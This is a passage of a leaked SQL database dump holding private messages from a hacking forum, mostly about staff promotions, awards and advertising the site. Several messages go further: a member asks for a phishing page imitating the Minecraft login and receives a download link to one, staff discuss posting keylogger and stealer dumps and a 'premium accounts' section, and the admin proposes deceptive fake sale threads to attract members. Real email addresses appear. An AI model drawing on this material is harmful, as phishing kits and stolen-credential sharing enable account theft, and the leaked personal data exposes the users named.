'1345247118', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('218', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Help Needed', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] [quote=\'t3h jok3r\'] OK, it\'s awkward that an Admin is asking their members for help but you asked if you can get promoted and you could help us out. I was wondering if you can help me out with a small task, if it works out then you would get a chance. [/quote] sure, with what? [/quote] I wanted to know if you were interesting in posting latest news including hackernews. We have a news and happening forum and if we post the latest news then people will do a research about it and if we are the first one to post about it then they will join our site to discuss etc. Also copy and paste news from thehackernews.com and since you can make guest comments on thehackernews, you can tell people to sign up at LH to discuss more etc. [/quote] Sure id love to', '1345247606', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('225', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Help', '0', 'Nice idea I might give it a shot.[quote=\'t3h jok3r\'] Yo sup man. I needed your help, I found some good website advertising techniques and some just came up on my mind. I really needed your help, if you can help me with this then I swear to god we will be getting active members from HF and other sites easily plus quick. What I need you to do is go on sites that are related to webmastering and create a fake thread saying you are the owner of L33THACKING.com and you are selling it. From this we will get some backlinks and shit loads of website views and it will so-call be advertising our site. Second, It doesn\'t matter if you don\'t want to do this or not but it\'s a good trick. Edit your custom title and put \"want to learn Social Engineering? PM me\" or \"PM me to learn how to Social Engineer for free\" Then when they do PM you, just give them a link to LH and say you can learn SEing plus get free PIDs from LH. [/quote]', '1345268355', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('242', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'News', '0', 'I guess no one liked my news post :( Ill find something new and post it though.', '1345332716', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('252', '67', '64', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"64\";}}', '2', 'Free Phishing Theme', '0', 'Website: http://www.minecraft.net/login Email: kristoffergo1@hotmail.com', '1345408668', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('256', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: News', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] I guess no one liked my news post :( Ill find something new and post it though. [/quote] Thanks and sorry for the inconvience. I wasn\'t really online much yesterday so didn\'t get a chance to look through. I would say Yahoo news is something you should concentrate on the most. Thanks for helping me out. [/quote] If you want me to post any interesting news that\'s fine. I can do that', '1345416730', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('260', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: News', '0', 'Alright, well Iv been thinking about posting something of world news daily and than a Hacking news story once A week. ', '1345418101', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('263', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: News', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] Alright, well Iv been thinking about posting something of world news daily and than a Hacking news story once A week. [/quote] So you would be posting one article a week? [/quote] World news daily, Hacker news weekly', '1345420557', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('266', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: News', '0', 'I was going to upload some other hacking tools I made but they got erased from media fire ahha, damn I wanted that award.. I better get coding.', '1345421202', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('277', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Reborn', '0', '[quote=\'t3h jok3r\'] I demoted reborn. Don\'t take me wrong, but he said he is running his own website so he is busy. Also I added a lot of funds on my PP and bought a sticky and banner ad on the profithers. It\'s a site with good trafficking anyways, what\'s your PP ID? [/quote] Kk good hopefully we get people. Also moneymachine3214@gmail.com', '1345476523', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('287', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Moderator', '0', '[quote=\'t3h jok3r\'] Hi, I would like to know if you are interested in being a sectional Moderator. We currently demoted Sin Cara and we are in need of a Mod. [/quote] I would love it <3', '1345499370', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('288', '67', '67', '64', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Free Phishing Theme', '0', '[quote=\'HoverCatz\'] Website: http://www.minecraft.net/login Email: kristoffergo1@hotmail.com [/quote] Here you go sir: https://dl.dropbox.com/u/20731986/www.minecraft.net.rar login.html is your phishing page. If everything goes wrong, kindly pm me back and i\'ll help you out. Cheers', '1345502430', '0', '1', '0', '0', '0', '2', '1345551114'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('289', '64', '67', '64', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Free Phishing Theme', '0', '[quote=\'HoverCatz\'] Website: http://www.minecraft.net/login Email: kristoffergo1@hotmail.com [/quote] Here you go sir: https://dl.dropbox.com/u/20731986/www.minecraft.net.rar login.html is your phishing page. If everything goes wrong, kindly pm me back and i\'ll help you out. Cheers', '1345502430', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('292', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Quick Question', '0', '[quote=\'t3h jok3r\'] Can you view the images in the thread below? http://l33thacking.com/showthread.php?tid=115 [/quote] Yes I can', '1345504064', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('295', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Quick Question', '0', 'Amazing aha. I\'m going to do my best being in this position.', '1345504203', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('298', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Quick Question', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] Amazing aha. I\'m going to do my best being in this position. [/quote] Thanks and good luck. Also thanks for the recommendation to your friend. [/quote] No problem, rixxon is a very HQ person and I think he will bring alot to the table.', '1345504434', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('300', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Quick Question', '0', 'What section am I going to be moderating by the way?', '1345504540', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('304', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Quick Question', '0', 'Okay, Thank you.', '1345504828', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('307', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Quick Question', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] Okay, Thank you. [/quote] No problem, could you like our FB page or follow us on Twitter? https://www.facebook.com/L33tHacking http://twitter.com/l33thackingcom [/quote] Done, Making a youtube video right now. I have a couple friends with alot of sub\'s 1k+ and my channel\'s video range from like 200-700 views each vid so ima advertise a bit.', '1345505190', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('310', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Quick Question', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] [quote=\'t3h jok3r\'] [quote=\'NXK\'] Okay, Thank you. [/quote] No problem, could you like our FB page or follow us on Twitter? https://www.facebook.com/L33tHacking http://twitter.com/l33thackingcom [/quote] Done, Making a youtube video right now. I have a couple friends with alot of sub\'s 1k+ and my channel\'s video range from like 200-700 views each vid so ima advertise a bit. [/quote] That\'s a good idea. Actually you would be the first one to get the YouTube award. [/quote] I made us a video, It\'s short but meh Hopefully people will see it. http://www.youtube.com/watch?v=Qd7bBe43ZE4&feature=youtu.be', '1345510745', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('314', '84', '1', '84', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Welcome to L33T Hacking!', '0', '[quote=\'t3h jok3r\'] Welcome to our forum Thunder™. I am the founder of this site, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.com/showteam.php]Staff list[/url]. Feel free to view our [url=http://l33thacking.com/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents. Hope you enjoy our forums. L33T Hacking http://l33thacking.com [/quote] Can i get free upgrade i am from profiters', '1345524902', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('326', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'You have been granted an award.', '0', 'You have been granted the [b]Elite[/b] award.', '1345557267', '0', '1', '0', '0', '0', '0', '1345601719'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('364', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Upgrade', '0', '[quote=\'t3h jok3r\'] Hi, You have active and HQ on LH ever since you have joined, if you would like I can provide you with a FREE upgrade to Elite. [/quote] Id really appreciate that. Thanks soo much :) I will continue to contribute to this great forum. I<3youu^^ Lovely greetings sirchamp ', '1345562364', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('368', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Error', '0', 'Sorry, I forgot to add you to the additional groups so you weren\'t able to change your userbar. Now you are free to change your userbar to Coders and still be elite. ', '1345589339', '0', '1', '0', '1', '0', '0', '1345601704'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('371', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Fuck', '0', 'I locked myself out of my admin account.', '1345591481', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('377', '61', '10', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"10\";}}', '2', 'Re: Help', '0', '[quote=\'swa4567\'] I posted my thread in the wrong forum. Can you please move it to the right section? http://l33thacking.com/showthread.php?tid=177 [/quote] Done!', '1345594942', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('380', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Q', '0', '[quote=\'t3h jok3r\'] Should I add a premium account section for upgraded members? People would find access to premium accounts such as upgraded accounts, pron etc. [/quote] Yeah that would be nice. ', '1345595671', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('383', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Q', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] [quote=\'t3h jok3r\'] Should I add a premium account section for upgraded members? People would find access to premium accounts such as upgraded accounts, pron etc. [/quote] Yeah that would be nice. [/quote] Done. It\'s under the upgraded tab. [/quote] are Keylog dumbs allowed? well more like dumps from my old Istealer', '1345596269', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('390', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Q', '0', 'Okay.', '1345596957', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('401', '53', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', '\"$$$Sharecash Moneymaking$$$\"', '0', 'http://www.mediafire.com/?70vz73teytzuana Do not give this \"direct\" link to anyone else. Enjoy', '1345648739', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('405', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Fuck', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] I locked myself out of my admin account. [/quote] Were you not able to pass through the l33thacking.com:80 popout or the admin login which requires the secret pin? [/quote] I remembered everything except my real Password.', '1345671215', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('410', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Fuck', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] I locked myself out of my admin account. [/quote] Were you not able to pass through the l33thacking.com:80 popout or the admin login which requires the secret pin? [/quote] I remembered everything except my real Password. [/quote] If you don\'t remember your real password then how did you login to LH forums? [/quote] I do not log out... Also I remembered it just nor the correct variation unroll after 5 tries', '1345723760', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('413', '90', '1', '90', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: You have been granted an award.', '0', '[quote=\'t3h jok3r\'] You have been granted the [b]Golden Upload[/b] award. [/quote] cheers lol thanks', '1345737900', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('418', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'My thread', '0', 'Hey. I made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks. [url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url]', '1345753521', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('419', '67', '67', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'RE: Skype IP Finder', '0', 'Hey I was using your Skype IP Finder.exe program And I got this error! :/ Error: Index was outside the bounds of the array.', '1345754088', '0', '3', '1345757256', '1', '0', '2', '1345757191'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('423', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: My thread', '0', '[quote=\'HoverCatz\'] Hey. I made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks. [url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url] [/quote] I\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? ', '1345756895', '0', '3', '1345757187', '1', '0', '0', '1345757164'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('425', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My thread', '0', '[quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey. I made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks. [url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url] [/quote] I\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? [/quote] Over 2800 minutes since i made it :p', '1345757187', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('427', '67', '82', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Skype IP Finder', '0', '[quote=\'iTzIpod\'] Hey I was using your Skype IP Finder.exe program And I got this error! :/ Error: Index was outside the bounds of the array. [/quote] Yeah ik. I cant edit the tread to say that it doesnt work anymore. I asked Joker to do it, so hes gonna do it in a moment. The error comes cuz the Api is down', '1345757256', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('428', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: My thread', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey. I made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks. [url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url] [/quote] I\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? [/quote] Over 2800 minutes since i made it :p [/quote] I thought there was no time limit for upgraded lol. Anyway, thanks for reporting. ', '1345757505', '0', '3', '1345817615', '1', '0', '0', '1345811450'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('430', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Youtube Video', '0', '[quote=\'iTzIpod\'] Hey can I download your Youtube video about L33t Hacking and then reupload it on mine? [/quote] Not if you\'re trying to get the youtube award. But if you want to promote us than yes.', '1345757751', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('433', '67', '67', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Skype IP Finder', '0', '[quote=\'HoverCatz\'] [quote=\'iTzIpod\'] Hey I was using your Skype IP Finder.exe program And I got this error! :/ Error: Index was outside the bounds of the array. [/quote] Yeah ik. I cant edit the tread to say that it doesnt work anymore. I asked Joker to do it, so hes gonna do it in a moment. The error comes cuz the Api is down [/quote] What is API? :/', '1345758307', '0', '3', '1345811280', '1', '0', '2', '1345811256'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('436', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Youtube Video', '0', '[quote=\'iTzIpod\'] [quote=\'NXK\'] [quote=\'iTzIpod\'] Hey can I download your Youtube video about L33t Hacking and then reupload it on mine? [/quote] Not if you\'re trying to get the youtube award. But if you want to promote us than yes. [/quote] I don\'t need the Youtube Award. I just want to promote this site. [/quote] Than yeah it\'s fine.', '1345758676', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('441', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', '[quote=\'t3h jok3r\'] You will now also be moderating the Forum Games sub-forum. [/quote] Ouu this is good :) this is good news my friend!', '1345767637', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('444', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] [quote=\'t3h jok3r\'] You will now also be moderating the Forum Games sub-forum. [/quote] Ouu this is good :) this is good news my friend! [/quote] Lol yeah but it\'s that more work for you? [/quote] Not at all. ', '1345768033', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('447', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] [quote=\'t3h jok3r\'] [quote=\'NXK\'] [quote=\'t3h jok3r\'] You will now also be moderating the Forum Games sub-forum. [/quote] Ouu this is good :) this is good news my friend! [/quote] Lol yeah but it\'s that more work for you? [/quote] Not at all. [/quote] Cool. Got some work to do on LH so see you around. Also are you upgraded on HF and do you have a account on ubers? [/quote] Yes I do. http://www.hackforums.net/member.php?action=profile&uid=590811', '1345768356', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('450', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] [quote=\'t3h jok3r\'] [quote=\'NXK\'] [quote=\'t3h jok3r\'] [quote=\'NXK\'] [quote=\'t3h jok3r\'] You will now also be moderating the Forum Games sub-forum. [/quote] Ouu this is good :) this is good news my friend! [/quote] Lol yeah but it\'s that more work for you? [/quote] Not at all. [/quote] Cool. Got some work to do on LH so see you around. Also are you upgraded on HF and do you have a account on ubers? [/quote] Yes I do. http://www.hackforums.net/member.php?action=profile&uid=590811 [/quote] Seems like you like [s]Drums & Bass[/s] bums and boobs. By the way, can you change your usertitle to something else? I mean I will give you something, it will help advertise LH. If you don\'t want to, trust me I don\'t mind at all. [/quote] Sure I guess.', '1345770970', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, 